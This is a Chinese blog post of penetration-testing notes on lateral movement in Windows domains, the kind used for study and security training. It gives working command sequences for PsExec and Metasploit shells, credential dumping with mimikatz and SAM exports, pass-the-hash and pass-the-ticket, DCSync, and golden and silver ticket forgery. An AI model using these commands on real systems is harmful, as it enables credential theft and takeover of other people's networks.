渗透测试-27:横向移动

域内横向移动

域内横向移动是指,攻击者以攻陷的系统为跳板,访问其他域内主机,扩大攻击战果

windows远程连接

  • IPC(Internet Process Connection)指进程间通信开放的命名管道
  • IPC 可以通过验证用户名和密码获得相应权限,比如远程管理计算机和查看共享资源
  • 通过 ipc$ 可以与目标机器建立连接,利用这个连接,可以访问目标机器的文件、上传、下载以及运行命令等

建立ipc$

# 建立ipc$
net use \\<目标IP>\ipc$ /user:<用户名> <密码>

# 查看建立的连接
net use

# 访问远程文件
dir \\<目标IP>\c$

# 使用 psexec.exe 反弹 shell
PsExec.exe -ACCEPTEULA \\<目标IP> -s cmd.exe

# 使用 MSF 中的 psexec 模块反弹 shell
use exploit/windows/smb/psexec
show options
set rhosts <目标IP>
set smbuser <目标用户名>
set smbpass <目标用户密码>
run
getuid

# 有些系统版本会报错,解决方案如下
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

密码、认证与权限

获取密码方式

  • 通过简单猜测或爆破:弱口令
  • 通过系统漏洞:溢出
  • 用户自己泄露:git、配置文件等泄露
  • 通过系统后门:中病毒等
  • 通过用户主机窃听:键盘记录
  • 通过中间人劫持:网络窃听

Windows密码文件原理

  • Hash 一般翻译做“散列”,也有直接音译为“哈希”的,就是把任意长度的输入(又叫做预映射 pre-image),通过散列算法,变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出(概率非常小),所以不可能从散列值来唯一的确定输入值。
  • 在 windows 下通过 SAMInside 提取到的密码 Hash 时,可以看到有两条,分别是 LM-Hash 和 NT-Hash,这是对同一个密码的两种不同的加密方式
  • windows 密码结构:用户名称:RID:LM-HASH值:NT-HASH值

密码导出方式

  • C:\Windows\System32\config\SAM
  • GetPass
  • Mimikatz
  • PwnDump7
  • WCE

Windows密码提取工具

GetPass

运行后可获取明文密码,2012版本之后的系统已经禁止在内存中保存明文密码

# 管理员身份运行 cmd
GetPassword_x64.exe

PwDump7

运行后可获取系统中所有账户的 NTLM Hash,可以通过彩虹表破解散列值,还可以通过哈希传递的方式进行横向渗透

密码在线查询:

# 管理员身份运行 cmd
PwDump7.exe

QuarksPwDump获取哈希

# 管理员身份运行 cmd
QuarksPwDump.exe --dump-hash-local

通过SAM和SYSTEM文件抓取密码

# reg save 将注册表中的 SAM、System 文件导出到本地磁盘
reg save hklm\sam sam.hive
reg save hklm\system system.hive

# 将 sam.hive 和 system.hive 放在 mimikatz.exe 同一个目录下
lsadump::sam /sam:sam.hive /system:system.hive

哈希传递(PTH)

  • 哈希传递攻击(Pass The Hash)是通过找到与账户相关的密码散列值(通常是 NTLM Hash)进行攻击
  • 在 windows 网络中,散列值是用来证明身份的(有正确的用户名和密码散列值,就能通过验证)
  • 由于大量计算机在本地安装时,可能会使用相同的本地管理员账号和密码,这样攻击者就可以使用哈希传递来登录内网中其他的计算机

获取哈希

mimikatz

# 提升权限
privilege::debug

# system 权限
token::elevate

# 读取本地 SAM 文件,获取 NTML Hash
lsadump::sam

# 在线读取散列值及明文密码,执行后生成文本文件
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

实验

使用 NTLM Hash 进行哈希传递

# 管理员权限运行 cmd
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::pth /user:<目标用户名> /domain:<域名> /ntlm:<NTLM Hash>

# 此时会弹出一个 cmd
dir \\<目标主机名>\c$

# 使用 PsExec 反弹 shell
PsExec.exe -accepteula \\<目标IP> –s cmd.exe
whoami
net nser

票据传递(PTT)

哈希传递需要具备管理员权限,票据传递不需要具备管理员权限

实验

使用kekeo传递票据

# 生成票据:TGT_administrator@ROOT.COM_krbtgt~root.com@ROOT.COM.kirbi
tgt::ask /user:<目标用户名> /domain:<域名> /ntlm:<NTLM Hash>

# 导入票据
kerberos::ptt TGT_administrator@ROOT.COM_krbtgt~root.com@ROOT.COM.kirbi

# 检测连接
dir \\<目标主机名>\c$

# 使用 PsExec 反弹 shell
PsExec.exe -accepteula \\<目标主机名> -s cmd.exe

使用 mimikatz 传递票据

privilege::debug

# 导出内存中的票据
sekurlsa::tickets /export

# 清空内存中的票据
kerberos::purge

# 将票据文件注入内存
kerberos::ptt <票据文件名>

# 使用 PsExec 反弹 shell
PsExec.exe -accepteula \\<目标主机名> -s cmd.exe

域认证流程

Kerberos 是用于验证用户身份的计算机网络身份验证协议。下面是 Kerberos 工作方式的一个简单描述:

  • 步骤1: 要启动 Kerberos 身份验证过程,首先客户机输入凭证(只有 userID) ,然后向 Kerberos Key 分发中心(KDC)的身份验证服务器发送一个身份验证请求。身份验证服务器验证客户机的用户名是否在 KDC 数据库中。

  • 步骤2: 如果客户机的用户名在 KDC 数据库中不可用,则无法对客户机进行身份验证,身份验证过程结束。如果在 KDC 数据库中找到客户机的用户名或 userID,身份验证服务器将向客户机发送一个 Ticket Granting Ticket (TGT)和一个 session key (SK1)。TGT 包含客户端 ID、客户端网络地址、时间戳和生存期。会话密钥(SK1)使用客户端的秘密密钥加密,TGT 使用 TGS 的秘密密钥加密。

  • 步骤3: 客户机使用客户机/用户秘密密钥(由用户输入的密码生成)解密消息并提取 Session 密钥和 TGT。解密后,此会话密钥用于与 TGS 的进一步通信。

  • 步骤4: 经过身份验证服务器的身份验证并解密会话密钥之后,客户机从 Ticket Granting Server (TGS)请求服务票证(用于 web/应用程序服务器访问)。

  • 步骤5: TGS 然后使用 TGS 秘密密钥对从客户机接收到的 TGT 进行解密,并提取会话密钥(SK1)。TGS 解密身份验证器(TGT)并检查它是否与客户机的用户名和客户机网络地址匹配。TGS 还使用提取的时间戳来确保 TGT 没有过期。如果流程成功地进行了所有检查,那么 KDC 生成一个服务会话密钥(SK2) ,该密钥在客户机和目标服务器(可能是 web 服务器或应用程序服务器)之间共享。

  • 步骤6: 客户端发送一个访问应用服务器的请求。这个请求包括 TGS 上一步接收到的服务会话密钥(SK2)。如果应用程序服务器可以对此请求进行身份验证,则客户端可以访问服务器。

伪造黄金票据

伪造黄金票据是域控制器权限维持的一种方式

票据传送实验

# 获取域名
net config workstation

# 获取主机名
nltest /dsgetdc:<域名>

# 导出 krbtgt 的 NTLM Hash,在域控的 mimikatz 中运行
privilege::debug
lsadump::dcsync /domain:<域名> /all /csv

# 获取域 sid(注:查出来的字符串中,sid 为去掉最后一段-xxx剩余的部分)
lsadump::dcsync /domain:<域名> /user:krbtgt
wmic useraccount get name,sid

# 伪造黄金票据
kerberos::golden /admin:<目标用户名> /domain:<域名> /sid:<域 SID> /krbtgt:<krbtgt 账户的 NTLM Hash> /ticket:<输出的文件名>.kiribi

# 现在可以将 <输出的文件名>.kiribi 保存下来,任何情况下都可以通过该票据进行登录到域控

# 清空票据
kerberos::purge

# 导入票据
kerberos::ptt <输出的文件名>.kiribi

# 验证票据
klist

# 检测连接
dir \\<目标主机名>\c$

# 使用 PsExec 反弹 shell
PsExec.exe -accepteula \\<目标主机名> -s cmd.exe

伪造白银票据

  • 白银票据(Silver Ticket),利用过程是伪造 TGS,通过已知的授权服务密码生成一张可以访问该服务的票据
  • 白银票据生成过程中,不需要经过 KDC,不需要域域控交互
  • 白银票据依赖服务账户(如:LDAP、MSSQL、DNS、CIFS等)的密码散列值

使用白银票据伪造CIFS服务权限

# 获取域名
net config workstation

# 获取主机名
nltest /dsgetdc:<域名>

# 获取域 SID(注:查出来的字符串中,sid 为去掉最后一段-xxx剩余的部分)
whoami /all
wmic useraccount get name,sid

# 获取 NTLM Hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > log.txt

# 伪造白银票据
kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标主机名>.<域名> /service:cifs /rc4:<目标机的 NTLM Hash> /user:<目标用户名> /ptt

# 验证权限
dir \\<目标主机名>\c$

# 使用 PsExec 反弹 shell
PsExec.exe -accepteula \\<目标主机名> -s cmd.exe
posted @ 2022-05-18 22:09  toki-plus  阅读(234)  评论(0编辑  收藏  举报